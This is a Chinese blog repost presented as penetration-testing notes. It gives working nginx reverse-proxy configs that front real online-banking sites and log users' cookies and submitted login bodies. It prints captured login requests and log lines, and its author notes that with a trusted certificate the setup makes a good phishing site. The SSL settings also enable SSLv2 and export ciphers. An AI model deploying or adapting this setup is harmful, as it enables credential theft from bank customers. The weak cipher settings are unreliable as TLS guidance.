使用nginx截取https数据

最新推荐文章于 2024-07-24 06:52:36 发布
最新推荐文章于 2024-07-24 06:52:36 发布
阅读量6.4k 收藏
点赞数
分类专栏: 资料收藏 文章标签: nginx protocols server 服务器 .net web服务

https虽然是加密的,本地还是有办法分析的,如进程注入等等方法,google看,太高阶。网上看到个简单的方法记一下

附:wireshark抓本机包http://wiki.wireshark.org/CaptureSetup/Loopback Other Alternatives: 改路由最简单


原帖:http://blog.chinaunix.net/space.php?uid=11170468&do=blog&id=2903067


 做渗透测试时,会碰到https加密的网页面,无法直接使用各种工具.可以使用web服务器软件对页面进行转发,从而实现脱密.这边使用nginx进行测试.

 

    建立一个nginx服务器,修改配置文件/etc/nginx/sites-available/default.以民生银行的个人网银行为例进行配置.

# You may add here your
# server {
# ...
# }
# statements for each of your virtual hosts

server {
        listen 80;
        server_name localhost;

        access_log /var/log/nginx/localhost.access.log;

        location / {
                index index.htm index.html;
                proxy_pass https://ebank.cmbc.com.cn/; 
        }

}


通过配置proxy_pass https://ebank.cmbc.com.cn/;使nginx成为一个代理服务器.重启服务后,对nginx服务器进行访问.http://192.168.52.129/index_NonPrivate.html:

 
通过WSockExpert截取提交数据
 

POST /weblogic/servlets/EService/CSM/NonPrivateLogin?channelID=&PriErrPage=PriErrPage.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument,application/xaml+xml, */*
Referer: http://192.168.52.129/weblogic/nonsecindex.jsp?channelID=
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 192.168.52.129
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=KMhkvGWG51B1f3y37MXvpkqSWvc8vcShLcjnchyLQSzyQq32C5nh!1655737129!270743917; K-JSESSIONID-lgnlbcme=3334A3537EB07580F51C46CFC8ABF69C

logintype=u&txcode=c99900&account=11111111111&loginPwd=222222&CheckCode=333333

如果需要记录通过ngnix代理提交的内容,修改default配置文件.

# HTTPS server
#
server {
        listen 443;
        server_name 192.168.52.129; 

        ssl on;
        ssl_certificate ssl/cert.crt;
        ssl_certificate_key ssl/cert.key;

        ssl_session_timeout 5m;

        ssl_protocols SSLv2 SSLv3 TLSv1;
        ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP;
        ssl_prefer_server_ciphers on;

        location / {
# root /etc/nginx/html;
# index index.html index.htm;
                proxy_pass https://pbsz.ebank.cmbchina.com/;
        }

        log_format main '$remote_addr - [$time_local] $request ||||| $http_cookie ||||| $request_body';
        access_log /var/log/nginx/access.log main;
}

    在日志文件中记录了$http_cookie(cookie信息)和$request_body(http内容),并使用招行个人网银为例.如果在申请一个通过认证的证书,站点将成为一个不错的钓鱼网站.

以下是截取的一个日志信息.包括了url信息,cookie信息和http提交内容:

192.168.52.1 - [05/Oct/2009:14:27:24 +0800] POST /CmbBank_GenShell/UI/GenShellPC/Login/GenLogin.aspx HTTP/1.||||| CMB_GenServer=Lo
ginType:A&BranchNo:0010&CreditCardType:A&IdType:01 ||||| ClientNo=015C3BBB172525FEBE9231E3448941E1515070230094203100051384&ExtraPwd=
3333&BranchNo=0010&AccountNo=ipJSoiVbS3HNMcI-3vYQsHiFp0WLlDsX9-eWKN97PbekdnzNzVg288TJCW6VdxDpufQfejoTCe-uSmgWZL67AQ__&Password=ikS2P
-JmservIWpMgda8hHEzLJA04Aa6viJx0QF2zrWUDlxiLpLTbqhbVNbfqgA0c7ipLQ0zLi3fEjZJAPRdMA__&HardStamp=Aj8wMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0ND
g5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NElGYmltRWVOyyIm2848AfJ9ZSdePA9n6S4j8Yf212z5y2pbjApY1HinUJmJCwGL48QLiWo8*Fmm75fzVtjTH9*fjI2qx*
CEXUKkf93ltwsSq5*UvM7zkGgCaCHXQPLF396CtYjkyC82CMVIHcB89kIq*iEF7XMXCbqKloHsh5LHSCYim0wKa28GzWczV2zX9tcqGkGAPwPXuzwTF3lk7BxZstXnFx59KK
jVerd8V5RNf-JAGe0aBSgt3CxxJQ__&Licex=AjgwMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0NDg5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NAAAAAAAAACqPBt4PB7
VfxBrLCVptuY12saTrYLj9xrwnsmeVMxt5O4K9LASxMNND3gZ8QOr2eQavsKgpUfsscvzXohvN7E4tbJocTwnpx6SJRsNjXImZDYP*Tq0YjH6i2ZbZu0m7gtnL01ibfqjTxM
a4vplPyCLgQ__&LoginType=A



rainharder
关注
专栏目录
Nginx实现本地http转https请求
web_15534274656的博客
09-11 3847
项目中有需要做接口回调,测试和dev环境都是https方式请求调用没有问题,但是本地调试不通。因为本地启动后端服务都是http请求,所以使用nginx代理,将http请求转换为https请求,方便调试。深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料。
nodejs+express+ nginx 实现https访问
轻量开发
03-08 4645
1.为什么用https? 超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息。HTTP协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息,因此HTTP协议不适合传输一些敏感信息,比如信用卡号、密码等。 为了解决HTTP协议的这一缺陷,需要使用另一种协议:安全套接字层超文本传输协议HTTPS。为了...
使用nginx发现接口获取到的数据截取
zcl_23333
06-20 2520
接口数据截取使用nginx,接口数据过大的时候,nginx会将写入缓存查看nginx错误日志 出现如下错误信息,原来是权限问题 2017/06/20 14:36:28 [crit] 18223#0: *759884 open() "/usr/local/webserver/nginx/proxy_temp/2/36/0000001362" failed (13: Permission deni
配置nginx解析https
Samopig的博客
03-13 422
注意:在生产环境中,您还需要获取一个有效的 SSL 证书,并将其安装到 nginx 服务器上。SSL 证书可以由认证机构(CA)颁发,并用于验证您的域名和服务器的真实性。在 nginx 服务器上生成一对公钥和私钥。您可以使用 openssl 工具生成这对密钥。将公钥和私钥放在 nginx 服务器的某个位置,例如 /etc/nginx/ssl/。在 nginx 配置文件中配置 HTTPS 服务器
Nginx 如何处理请求的加密和解密?
最新发布
发现生活,分享智慧,一起成长!
07-24 822
如果请求是经过加密的,Nginx 就需要进行相应的解密操作,以获取请求的真实内容,并将其传递给服务器。反之,当服务器返回响应时,如果响应需要加密,Nginx 也会负责进行加密操作,然后再将加密后的响应发送给客户端。当我们在网络世界中穿梭,发送和接收各种请求时,Nginx 就像一位尽职尽责的卫士,默默为我们处理着请求的加密和解密工作,确保信息的安全传递。然后,将请求传递给服务器。想象一下未来的网络世界,就像是一个充满未知宝藏的神秘岛屿,而 Nginx 将继续作为我们可靠的探险伙伴,为我们守护信息安全的宝库。
Fiddler抓包之【 抓取https请求 】详解教程
热门推荐
m0_70618214的博客
03-16 2万+
抓包之前,先了解一下Fiddler。   Fiddler是一款免费且功能强大的数据包抓取软件。它通过代理的方式获取程序http通讯的数据,可以用其检测网页和服务器的交互情况,能够记录所有客户端和服务器间的http请求,支持监视、设置断点、甚至修改输入输出数据等功能。fiddler包含了一个强大的基于事件脚本的子系统,并且能够使用.net框架语言扩展。
截取字符(Https)
jin020863的博客
12-21 401
NGINX 拦截指定请求并返回json数据
gaoduicai的博客
06-29 1491
hosts将域名指向本地。nginx构造下路径。
已经编译的nginx添加https.txt
12-25
HTTPS协议通过SSL/TLS加密层来保护数据,确保客户端与服务器之间的通信不会被第三方截取或篡改。 **详细解释:** 1. **SSL证书获取:** 首先需要获取SSL证书,这可以通过自签名证书或者向认证机构申请获得。 2. **...
实战部署Nginx配置https网站
hht927的专栏
12-16 428
SSL(Secure Sockets Layer 安全套接层)及其继任者传输层安全(Transport Layer Security,TLS)是为网络通信提供安全及数据完整性的一种安全协议。 Nginx(engine x)是一个高性能的 HTTP 和反向代理 Web 服务器。 而网站需要安全和高效的提供服务,SSL 和 Nginx 就是最完美的解决方案。 在本场 Chat 中,会讲到如下内容: ...
HTTPS中间人攻击,HTTPS被抓包了怎么办?
ThinPikachu的博客
03-12 1万+
目录 一、写在前面 二、什么是中间人攻击 三、https 是绝对安全的吗 四、中间人攻击的初步了解 五、中间人攻击的深入了解 六、https 是如何防止中间人攻击的 SSL-Pinning 七、浏览器是如何确保CA证书的合法性? (1)证书包含什么信息? (2)证书的合法性依据是什么? (3)浏览器如何验证证书的合法性? 八、https 可以抓包吗 九、预置证书/公钥更新问题 一、写在前面 首先,当个位读者在看到这篇文章时,我默认大家已经对...
nginx location中uri的截取的实现方法
01-10
说明: location 中的 root 和 alias root 指令只是将搜索的根设置为 root 设定的目录,即不会截断 uri,而是使用原始 uri 跳转该目录下查找文件 aias 指令则会截断匹配的 uri,然后使用 alias 设定的路径加上剩余的 uri 作为子路径进行查找 location 中的 proxy_pass 的 uri 如果 proxy_pass 的 url 不带 uri 如果尾部是”/”,则会截断匹配的uri 如果尾部不是”/”,则不会截断匹配的uri 如果proxy_pass的url带uri,则会截断匹配的uri Examples locati
nginx截取请求uri中的url进行重定向
panxin1051的博客
12-06 5419
nginx截取请求uri中的url进行重定向
浅谈HTTPS以及Fiddler抓取HTTPS协议
稻草人技术博客
10-26 5528
最近想尝试基于Fiddler的录制功能做一些接口的获取和处理工作,碰到的一个问题就是简单连接Fiddler只能抓取HTTP协议,关键的登录请求等HTTPS协议都没有捕捉到,所以想让Fiddler能够同时抓取到HTTPS和HTTP协议,设置只是很小的一步,关键是了解HTTPS协议的原理、Fiddler抓取HTTPS协议的原理,然后才能更好的理解如何进行设置。本文主要由三部分组成,第一部分用比较通俗形象
nginx location中uri 的截取
xinlus的博客
04-18 1万+
说明: location 中的 root 和 alias root 指令只是将搜索的根设置为 root 设定的目录,即不会截断 uri,而是使用原始 uri 跳转该目录下查找文件 aias 指令则会截断匹配的 uri,然后使用 alias 设定的路径加上剩余的 uri 作为子路径进行查找 location 中的 proxy_pass 的 uri 如果 proxy_pass 的 u...
Tcpdump+Wireshark抓取Nginx-https协议数据
weixin_49319422的博客
08-13 4911
1.nginx 介绍 Nginx 是高性能的 HTTP 和反向代理的服务器,处理高并发能力是十分强大的,能经受高负 载的考验,有报告表明能支持高达 50,000 个并发连接数。 NGINX可以实现正向代理、反向代理、负载均衡等操作,总之就是强大,这里就不多介绍了,想要了解详情的可以参考:https://www.cnblogs.com/muhy/p/10528543.html 安装 在安装nginx前首先要确认系统中安装了gcc、pcre-devel、zlib-devel、openssl-devel。 y
nginx请求相关参数
kongkong的专栏
10-18 798
1. 获取param参数 local arg = ngx.req.get_uri_args(); for k,v in pairs(arg) do ngx.log(ngx.WARN,"key=",k," val=",v); end 2. 读取body -- 解析 body 参数之前一定要先读取 body ngx.req.read_body() local arg = ngx.r...
nginx截取字符串
依步_的专栏
10-19 7157
测试nginx代理转发时,遇到这样一个问题: 请求url:http://1.1.1.1:8080/testimp/abcd/123?a=1&b=2&ip_port=2.2.2.2:1234 要求nginx使用参数ip_port重新转发,转发的url如下:http://2.2.2.2:1234/abcd/123?a=1&b=2&ip_port=2.2.2.2:1234 如下nginx配置可实现: location ~^/testimp/(.*)$ { pro
nginx日志截取
weixin_33701617的博客
06-10 383
cat access.log | awk '$4 >="[22/Jun/2018:11:41:00" && $4 <="[22/Jun/2018:11:43:00"' > 1.txt 转载于:https://blog.51cto.com/13594742/2406674
ubuntu使用nginx安装https
09-13
要在Ubuntu上使用Nginx安装HTTPS,需要执行以下步骤: 1. 安装Nginx: ``` sudo apt update sudo apt install nginx ``` 2. 生成SSL证书: ``` sudo apt install certbot sudo certbot certonly --nginx `...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值